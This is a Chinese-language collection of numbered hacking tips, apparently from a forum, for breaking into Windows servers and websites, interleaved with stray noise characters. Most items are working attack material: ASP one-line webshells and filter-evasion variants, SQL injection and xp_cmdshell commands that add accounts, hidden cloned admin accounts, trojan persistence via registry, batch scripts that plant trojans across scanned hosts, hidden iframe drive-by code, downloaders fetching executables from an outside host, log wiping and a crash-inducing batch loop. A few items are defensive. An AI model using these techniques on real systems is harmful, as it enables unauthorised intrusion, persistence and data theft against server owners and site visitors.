1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,. h' ` U- {3 B2 Z* m9 E* Y
cacls C:\windows\system32 /G hqw20:R
2 F. N7 [8 |" r* A) v思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入. X- {4 u# q/ S% _
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F& d- h' q6 B: H2 r
7 G6 k; m7 m* f! ?% N2 N
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
/ w( R1 K0 T9 J* M! Y5 L' W9 ]! [+ v3 @! ^' A6 q; a1 z
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。' P' X) ~ {# o3 W5 r `0 o; D, y1 ?
0 U' E0 ~6 E- ^- K( E+ }' ]! O4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号" }7 K C! i1 {) i4 G
% z, R! o; h2 B' B) j- r5、利用INF文件来修改注册表
6 M$ f& U# U) ^5 u" e2 e% A2 ?- Y/ N! a[Version]
0 h7 P- }; c& Y& XSignature="$CHICAGO$". q4 X' E! w2 k' U" s
[Defaultinstall]
# p3 D' H7 r' Q- UaddREG=Ating( K0 b4 c# T2 v5 z5 n% S! W
[Ating]
. p7 ^1 G( Y4 p/ M8 P* Z: _HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1") ?3 r4 N0 c N; R% A7 v
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
! n6 Y/ J/ V% B9 yrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径' }- s: g2 {& L& s* i5 X" z
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU# Q$ t$ Z3 U1 V: J, y% j2 S2 x
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
& i$ Y/ \9 ?# iHKEY_CURRENT_CONFIG 简写为 HKCC
# R; ]* O8 N+ L+ H) e# Q3 v; Y0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值: M3 V0 U8 u* W4 D
"1"这里代表是写入或删除注册表键值中的具体数据" U0 G' @& y& I) z& \0 G
l, s: x3 n: R8 X- g' `6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,% \. ]9 ?) u! ]$ T# R
多了一步就是在防火墙里添加个端口,然后导出其键值
# N, Z9 Q9 O' ?% U; `[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
9 G' a; F" D$ G1 [' g% w% z$ |, _. g8 U( X N& Z. A- G4 f( e
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽/ O* W" _& F; Y$ A, K
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。$ B& Y/ f! A- O
l* a0 C/ V& r* X, I% @# P8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。. Y5 X/ L# h$ v/ P
' Z" L7 S7 @3 d2 \( M9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,( a( B9 b1 M5 s6 H: E
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。( f- V* x, _8 G+ A% d, [4 C
8 U' S, Z( T* G9 L; t; X; e3 f
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”& w: O! T2 b7 H: k
: ~; q8 }2 s6 @& T3 ?; r11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,+ F+ e) ?' U7 K" q+ N i: O
用法:xsniff –pass –hide –log pass.txt7 g$ W7 {/ f/ t* ^% p
. } S1 }* k( y/ l: ~/ _( M12、google搜索的艺术 U9 Y# x, B5 P( ~
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
! f9 q2 M' Y3 }8 E* E G或“字符串的语法错误”可以找到很多sql注入漏洞。1 V7 T- s' W; b9 e" i' G0 f) k6 O
4 l/ e( m. @" e; N+ ?13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
) a m, m- T- s7 q! j8 D" d! H! I" f( a: H5 N& \3 C3 f
14、cmd中输入 nc –vv –l –p 19878 X3 ] j. p2 L" ^& A6 P5 G
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃 b M3 H$ A% ^* q. A+ d! H
. i; u# n+ S* U' P$ Q1 U15、制作T++木马,先写个ating.hta文件,内容为2 y F8 H0 [ R/ J; F
<script language="VBScript">
( a$ F7 L$ q- J& O6 Yset wshshell=createobject ("wscript.shell" ): m' r: u4 d+ q0 {
a=wshshell.run("你马的名称",1) E% B8 E, o4 O6 i9 M7 h
window.close5 `1 @9 r: Q/ d9 z3 z( I' Y$ S
</script>
1 p' a5 q* V/ E, i' A B* V再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。7 x, e& B( u1 Q2 V# L
) F% a# t% `1 Q
16、搜索栏里输入
- Z Z0 B8 B* ?- i% u5 ?0 _关键字%'and 1=1 and '%'='
3 e) y8 X M5 C8 t; s* v4 \: D关键字%'and 1=2 and '%'='+ g6 ?: g" h$ g" n, @8 C4 K: n. z
比较不同处 可以作为注入的特征字符
1 H4 e6 l; o0 l; E- w+ N. ^$ m! H4 a J; I+ \: A6 D
17、挂马代码<html>
" @% ~$ h! R- |! q# b6 w<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
/ E' ], T! i3 T</html>- C' ]8 j9 ]5 _$ R5 S J8 B
- u; u9 R: T4 ^+ v18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,7 P$ g) f2 y2 G* W0 G
net localgroup administrators还是可以看出Guest是管理员来。
- W" U. I( `2 }+ C( Q
# R/ K7 W2 K! z0 Q4 }19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
6 h2 Z4 |. o; L5 p0 {用法: 安装: instsrv.exe 服务名称 路径
$ o. ~3 w. b2 c* Q9 i: M3 F% s卸载: instsrv.exe 服务名称 REMOVE
. N/ |; _6 `4 n) d3 z7 l" ]$ {. u$ z+ F% X6 Q9 L
) `. C( p% i- P% f+ T5 [7 f8 ]! {
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
8 ]; G+ w5 @, `2 K! H0 `0 c不能注入时要第一时间想到%5c暴库。 M! m6 s2 \. N# |( Y! _
8 R L) V% O. e5 ]: Z% B- G22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
* D; g' `* B: o- I* E3 l0 l! H7 H2 Q# j3 B' W& w
23、缺少xp_cmdshell时- [+ c9 x0 T$ M/ \: R
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
9 X; ?. y7 h7 c$ M% T假如恢复不成功,可以尝试直接加用户(针对开3389的)' d8 q( [/ |: B' E6 C
declare @o int
8 c! A3 |. b! t7 y+ T4 Cexec sp_oacreate 'wscript.shell',@o out7 p( Z: s5 I$ a3 t) f
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员, |3 ^; y( o- n( Y. [ n3 W
/ v5 L( H* ?9 e/ r) \. d# O- t
24.批量种植木马.bat; e0 h3 b% G! {6 t3 v4 M
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中6 y9 i2 O) @* u: F
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间! `3 I' o: Y) a# e. E. X
扫描地址.txt里每个主机名一行 用\\开头9 d5 \# e5 l1 O {/ K) B# k
0 g- w% M7 }5 H/ i! E4 X
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。; p0 q% X$ i3 C# ` J
4 w* C- C/ R* ^9 D( ?& ]26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
6 e' h/ j f5 J+ @; r# j: b, H将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
3 c9 Y; Y @& i, W, t4 f/ O/ Y.cer 等后缀的文件夹下都可以运行任何后缀的asp木马$ _1 `$ j6 e j5 h, n
3 x% ^9 L k" M1 o' S! q) {9 k
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP: w6 F" q. j* u" L+ U
然后用#clear logg和#clear line vty *删除日志
7 e9 P0 o; Z) d' ]; y: T+ i5 G+ x2 a2 k5 K3 Q+ v' n7 R/ }
28、电脑坏了省去重新安装系统的方法
* c9 F* s. k% [8 t b' W2 L* F纯dos下执行,0 O! Y. W! C3 Q. V& _% S
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config5 _: S) L( T; s: u* x, ?
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
7 h5 O0 f/ w- E# n# {2 q# O3 Q# q5 q+ y: x9 O
29、解决TCP/IP筛选 在注册表里有三处,分别是:% F# L8 M4 U; M2 z2 ]0 x
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
$ f6 v8 E% G4 P- F: W% DHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip: [! l# Z! ?& V$ i' R F" U
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ U) C- m0 n! @( w分别用
. ]- {+ w4 W) \3 i6 z* P- j, M8 O$ H4 oregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- Y1 p* K) ?8 u& Bregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) {9 Z8 u, C. qregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
K5 \2 ^: i- M% Y- v命令来导出注册表项
% r r/ F2 x+ T" Q% I- ^9 Q7 m然后把三个文件里的EnableSecurityFilters"=dword:00000001,; J' j) a3 H0 y* u4 n
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
& Z5 S$ w. A5 A" W6 zregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。5 q2 b) g0 g* \+ Q8 t( B$ f" L, u
* Z- z( W6 |* j% s" N$ y% d30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U! k) `0 E+ |. ?% q
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
- p& j5 F# p) R( I* ]! V0 X6 A) ]4 C" E i
31、全手工打造开3389工具
8 S5 d) @9 M& ]打开记事本,编辑内容如下:$ {' U" ?! t. K" W
echo [Components] > c:\sql
( _& Z. B3 [6 o7 mecho TSEnable = on >> c:\sql) E) L2 Q. ?% T5 E- N4 s1 c
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
( l4 s: \# Z4 c编辑好后存为BAT文件,上传至肉鸡,执行
8 y) s1 g% Z# e" x, L6 w" H! u6 D% N2 F" `
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
# u) ?, {6 G- i' _% ~
' F5 {7 L/ P+ ^2 J9 [" _33、让服务器重启
7 q1 M6 q; f5 f写个bat死循环:
0 u& l% S: F" s@echo off( W: F4 K2 h: e, ~% ?5 N8 N8 \4 T
:loop1
1 o3 ?* _1 H. J$ @2 Y; vcls
* ?# }" s+ B& s% W H Fstart cmd.exe
. }, M( Q" `# K" W4 pgoto loop1
! X5 n: n7 Q' |+ X$ P0 Q保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
y1 T, T) |1 S; @; \6 V t% c7 \% N! A9 O8 R
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,! `% q4 t/ q3 b( u% j: b
@echo off9 f- p% x7 h1 {& I# r, d
date /t >c:/3389.txt
* G2 D) k4 F# ztime /t >>c:/3389.txt
6 F: f% e0 Y4 n3 U, f n% d) battrib +s +h c:/3389.bat0 x6 O9 I3 O F+ D0 Q
attrib +s +h c:/3389.txt2 y) r* K( N5 r
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
9 ?" C! F5 ` U) v2 o并保存为3389.bat
/ m6 I, H5 \' S. }! A0 ^; H3 I打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
# j% M- A+ f: x" Y! }( m& W4 w0 y# g4 U" {8 l. K. T2 T
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
$ G W/ s0 W w0 Tstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)/ n4 l$ K3 b1 c* U O2 w
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。( X8 H, f6 f( U/ n/ W0 D) v
! ~/ S6 o' V$ ?% c' |7 f8 c36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件. h, I& M. [, z" n: l( L3 z _
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址5 e9 Q1 v; p1 f* G- h' _; T0 F
echo 你的FTP账号 >>c:\1.bat //输入账号- H$ l& q) a% }$ \
echo 你的FTP密码 >>c:\1.bat //输入密码
# s8 b) K' [ techo bin >>c:\1.bat //登入
9 V9 h7 y, S$ t& Q2 P1 n. T* y8 vecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
, `4 Q* I: {# s9 @! decho bye >>c:\1.bat //退出$ ^. e; Q# y0 z J2 E
然后执行ftp -s:c:\1.bat即可
% ]1 w2 ~1 m: ]6 x( e
: M$ U( k7 v2 A37、修改注册表开3389两法
0 T! E: h% g* n2 z) d(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表* |. W) k, n! n# U
echo Windows Registry Editor Version 5.00 >>3389.reg
/ b6 X% V, @$ j; |4 Jecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg4 D( S" k# d+ R1 U/ N5 Q' e
echo "Enabled"="0" >>3389.reg5 g% g4 T( [" z" w9 n& ]
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows) |( b$ ~; t# b4 k7 }& { k. {" g# w
NT\CurrentVersion\Winlogon] >>3389.reg
; {7 y0 x( p _# ~echo "ShutdownWithoutLogon"="0" >>3389.reg) F. x# B p7 K7 _: f( L% d
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
! C8 t9 ?% N, C) v>>3389.reg& W& C2 A* z4 v- r8 t; t
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
5 S: F+ {& x6 a6 b2 @) Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
& O$ [& s1 r" ?- F>>3389.reg
; `* M" K: ]! Y) T! Pecho "TSEnabled"=dword:00000001 >>3389.reg
/ h) ~4 m6 [/ z$ ^* _% Z& qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg" N/ C) l& J6 _8 [
echo "Start"=dword:00000002 >>3389.reg
; [3 `- y% p. f( g+ ^. r, Y9 u) Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
9 i0 B$ C: v+ P8 I>>3389.reg
, g! ^4 e$ a) `9 j- ?4 o$ E2 zecho "Start"=dword:00000002 >>3389.reg5 A, ~5 ^9 {( e) `
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
. F" v& ~: @, X, ? y* Gecho "Hotkey"="1" >>3389.reg
: p% s# J& z. {- q/ a }# h' mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal n! ?2 i/ i, ]& K0 U" z1 n x' y$ ~
Server\Wds\rdpwd\Tds\tcp] >>3389.reg. [# H( v4 t3 ^' u8 V
echo "PortNumber"=dword:00000D3D >>3389.reg; S! w9 q$ B7 t5 O% Y7 I$ X5 x* y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! B6 V5 I9 @: z0 O' e$ W% s R: F
Server\WinStations\RDP-Tcp] >>3389.reg9 U+ X" w7 P! p8 f1 c9 J
echo "PortNumber"=dword:00000D3D >>3389.reg5 x6 F5 _1 N& j, l H& D6 ?/ l
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。3 d6 `: C4 R4 Y/ Z* \& X
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)( G" V; I4 p; n6 b E: H6 q& F
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
) l6 }7 l& Y; y8 ~. z$ g: R(2)winxp和win2003终端开启 `$ o! c4 S% n" |# Z/ K: q
用以下ECHO代码写一个REG文件:! k* A' J0 m( O9 f6 U
echo Windows Registry Editor Version 5.00>>3389.reg
( S/ i% c& x6 S: X$ Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. ~& i3 ^* i1 s! e1 J1 D: h* X
Server]>>3389.reg
# y1 O8 X: M( k! n( }echo "fDenyTSConnections"=dword:00000000>>3389.reg
% i- n/ ]5 X+ c% A8 e4 h M5 Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 C3 k! t/ L' D! @ |Server\Wds\rdpwd\Tds\tcp]>>3389.reg6 U; p. p9 U N! f- y
echo "PortNumber"=dword:00000d3d>>3389.reg
- ^9 G% D! e9 ^8 h2 \, `, pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" C5 {, z$ i P" a n8 J3 G) \1 w$ r
Server\WinStations\RDP-Tcp]>>3389.reg
) `2 W7 u/ I" _5 q" l' Decho "PortNumber"=dword:00000d3d>>3389.reg+ }9 R( O7 p9 W7 H, h$ N& M
然后regedit /s 3389.reg del 3389.reg
. s3 ^- [% w9 w6 y- WXP下不论开终端还是改终端端口都不需重启! T# m7 h7 K# v6 ^! T [' @+ Q. z
: f1 \, L7 q0 I" E38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃. j) b" R1 c. _ D
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
& P% S0 T1 B5 w, \4 E' `( u! v9 K
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!7 F. O, {$ B. X$ m* Q: ]8 K! F+ n/ j9 s
(1)数据库文件名应复杂并要有特殊字符
2 T: ]" ^, } |& ~$ @; B$ C3 B(2)不要把数据库名称写在conn.asp里,要用ODBC数据源$ N* y& B3 |+ l4 I0 w
将conn.asp文档中的) L: z" C; ~ Z' G4 G& j
DBPath = Server.MapPath("数据库.mdb")1 K7 B7 _+ |! B& X, X* p
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath5 a% S: Z. G: t+ U6 o, |
: a! s0 `% E+ P& L+ E" {6 @
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置) k" M/ w" [/ o3 ^
(3)不放在WEB目录里
5 \ h$ H; E' g8 e. F O3 c) D8 O8 Y, s, e$ X
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
6 S, ~5 J& b. n3 n& f- u2 ^可以写两个bat文件/ y @$ l' C+ p4 Z, s F2 y
@echo off
8 S" Q- z( x$ U3 }@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
, V) r0 @( \' D$ x: I3 [: r@del c:\winnt\system32\query.exe2 p+ W- e. q5 D7 G4 [
@del %SYSTEMROOT%\system32\dllcache\query.exe
$ l" I0 w5 [: I# j) N& U. X@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的) ` [7 o v a
( ^7 _5 e0 V2 W@echo off! O2 s/ k: V- E, l% B, w
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe" K9 V8 z# ]$ q: D
@del c:\winnt\system32\tsadmin.exe
; h' a- P* u9 E! Y6 V7 }+ w0 r$ b@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
6 v" L5 g+ a+ B" W2 A6 r W3 d( X T0 i7 W& n
41、映射对方盘符
7 M" k) c+ x/ E1 X O6 Utelnet到他的机器上,# @. F4 r4 b+ e. J! f; P
net share 查看有没有默认共享 如果没有,那么就接着运行4 f8 x5 s( f& P$ ?2 w! e
net share c$=c:' y3 E4 z% Y" W7 Y3 v+ M
net share现在有c$/ H' @; Y; B- F$ G! \ Z" o
在自己的机器上运行
: u" l9 A4 o( \% Lnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
( h m; y' ~5 E) [" I2 W
0 K( r' f; c f2 U6 a42、一些很有用的老知识
5 A& l+ M5 m7 stype c:\boot.ini ( 查看系统版本 )
# x# L, u: L& z- D& gnet start (查看已经启动的服务)$ |. K9 |( }0 Z9 w! k6 |- M
query user ( 查看当前终端连接 )
8 L9 ?: p$ s3 I7 Q8 [net user ( 查看当前用户 )# }) J+ d3 P1 c1 c4 q- N F
net user 用户 密码/add ( 建立账号 )
: v% n# m6 b5 ? J% C9 U1 x( T6 Wnet localgroup administrators 用户 /add (提升某用户为管理员)! B7 z' M6 u5 N$ r% E" U
ipconfig -all ( 查看IP什么的 )
! V) t$ k3 A+ S4 O: o7 m0 @netstat -an ( 查看当前网络状态 )* X. x8 K( j# u9 r$ Q* z0 K2 R$ N
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
C; w7 s7 w$ Z克隆时Administrator对应1F4
; k3 _9 v1 a# W0 Wguest对应1F5
) i, b: t/ k. J+ m# E, m# `tsinternetuser对应3E8
2 y" {9 b7 Y4 E+ f8 v* ~: Y6 ^& U- M; N& I
43、如果对方没开3389,但是装了Remote Administrator Service; A! u7 U- `' D: V% V# @
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接% a7 k; S* w) b+ ]$ f
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
# T, n$ p0 e$ f先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"* S2 p+ t/ S" F& k( Z. l; I
" t/ b6 w/ I- p$ _8 q# C7 {& l2 G44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)" W1 ^" a" }& v. q( x
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
' c+ R$ Q% l# j# a/ [( Q$ K
; j% |; c5 }; q) C8 ? t8 A. Y+ ^45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入): s" W2 \* b; A N% _
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
6 G2 P9 X3 |- r, A^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
+ w4 `$ f3 p3 J3 Y5 C9 pCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
# U3 k% }- D7 s# t& R1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs1 {' W# l0 b3 Q2 i
(这是完整的一句话,其中没有换行符)
) A; a1 Q) u4 K然后下载:
% L. \2 P$ }6 P3 @8 ocscript down.vbs http://www.hack520.org/hack.exe hack.exe
/ @& \0 `% k9 X$ m {0 q" N! {( k0 J) L4 j$ g. l7 |& {. z6 N! I8 L
46、一句话木马成功依赖于两个条件:
4 |: f8 [8 E3 }1、服务端没有禁止adodb.Stream或FSO组件( n8 ?0 y1 C* D6 k" w
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
6 c0 t! `1 C. r* r' w
$ s8 _, B% r9 X47、利用DB_OWNER权限进行手工备份一句话木马的代码:
# E; y6 c: q/ V2 u;alter database utsz set RECOVERY FULL--
+ b% p( ^) q9 v7 v;create table cmd (a image)--
' Z1 [7 Q- j" ^4 c6 M, `: b;backup log utsz to disk = 'D:\cmd' with init--
% C& N2 z! K9 z/ T/ I+ V5 [;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--# ^9 Q% B2 ?7 p
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--, w7 {5 X. o8 L# b1 l
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。8 ?4 K: S3 k1 z2 ?, k) v; |
/ H. K' f* A2 n7 |5 p0 ~
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:9 L+ X) e7 k# i. l; F
0 Q/ Y2 l$ ]7 n9 N! }
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options" o% y B! x+ N7 e7 Z
所有会话用 'all'。; T, G- C9 t5 t' u( l% m$ u- _
-s sessionid 列出会话的信息。
, d6 ]8 ^( y7 U: ]! w. P6 Q7 h-k sessionid 终止会话。$ k5 K; e" F* |- J& K
-m sessionid 发送消息到会话。* I; K' c4 i* [6 U
& c4 V3 P; _( \0 u5 S% v/ S; Lconfig 配置 telnet 服务器参数。6 w e3 L2 [$ G# z) G
h( o$ d+ u9 s8 d9 h: ocommon_options 为:
' i0 v1 K* F9 O3 ^' K4 C-u user 指定要使用其凭据的用户2 Z4 c& Q5 i* }/ _
-p password 用户密码
) Q2 t' F1 l/ g1 \9 d ~; Q2 W/ ~1 O) ?) c7 u2 p( ^& H4 G" ~1 C+ j* _, G
config_options 为:
6 A* g0 H8 L+ t) l# T/ rdom = domain 设定用户的默认域
3 ?3 j1 S8 I4 }ctrlakeymap = yes|no 设定 ALT 键的映射
5 p3 ]( r5 B, ]0 D: ftimeout = hh:mm:ss 设定空闲会话超时值1 V0 k* D4 h" Y: A
timeoutactive = yes|no 启用空闲会话。' o; k* E s( M; W; @; p
maxfail = attempts 设定断开前失败的登录企图数。
+ }: e" h7 [( k' ]maxconn = connections 设定最大连接数。- ]5 f( _1 W8 [1 M: ~/ u
port = number 设定 telnet 端口。; f- t6 z; Y& V4 K
sec = [+/-]NTLM [+/-]passwd8 J! \3 ^" I# g. v& Y5 h
设定身份验证机构
$ d/ {4 G! _4 E/ o5 ]9 a: K. cfname = file 指定审计文件名。
- R# j* m6 P$ ]+ J8 R* z. e2 v" Xfsize = size 指定审计文件的最大尺寸(MB)。' J/ p( f/ F$ L, [
mode = console|stream 指定操作模式。
: A7 e2 m9 l6 v4 b0 h5 f2 Eauditlocation = eventlog|file|both, U. ^, l+ P9 |
指定记录地点
0 x7 S/ p1 Y& C) l/ ^audit = [+/-]user [+/-]fail [+/-]admin
- U; U4 x U: l$ G8 y0 J" G* W4 h4 E. T- K2 c* S8 q# j! C& _- I
49、例如:在IE上访问:
9 ^) X# v# Q: \www.hack520.org/hack.txt就会跳转到http://www.hack520.org/5 B$ X( e+ Y+ y+ [, W* `1 c
hack.txt里面的代码是:; X# K% o! @- B1 @9 a; W
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
0 e H! H8 s$ O. s0 o- p) b% H把这个hack.txt发到你空间就可以了! W6 D5 i L. J! c3 F) x
这个可以利用来做网马哦!! U/ o& J. z6 [2 e6 {
# I1 R L. Q' v: m4 v& ?
50、autorun的病毒可以通过手动限制!
+ V2 r8 f( ~/ `3 r7 I0 i! ^3 M8 y. |1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
* {4 F) Q. N( p. g2,打开盘符用右键打开!切忌双击盘符~- ]/ v `2 Y5 k
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!% }6 s! _ R! F) D3 E3 G1 ?
& B4 ~8 `; h* `5 F" V
51、log备份时的一句话木马:
; S- D* C- c( k) W# La).<%%25Execute(request("go"))%%25>$ o6 e2 e2 R4 u2 ^
b).<%Execute(request("go"))%>
& z- U( i1 ]0 Y- L0 i" n( ^" ~2 rc).%><%execute request("go")%><%" i$ y/ X l3 @* R$ |7 M8 E& _
d).<script language=VBScript runat=server>execute request("sb")</Script>) c6 R1 U9 a" S
e).<%25Execute(request("l"))%25>$ _8 A# r, i+ `7 P* \
f).<%if request("cmd")<>"" then execute request("pass")%>
$ l- l) x2 {4 ?# @- G9 Y3 }$ [ ]7 M; A" C
52、at "12:17" /interactive cmd, W! k% g' @4 I5 z& J
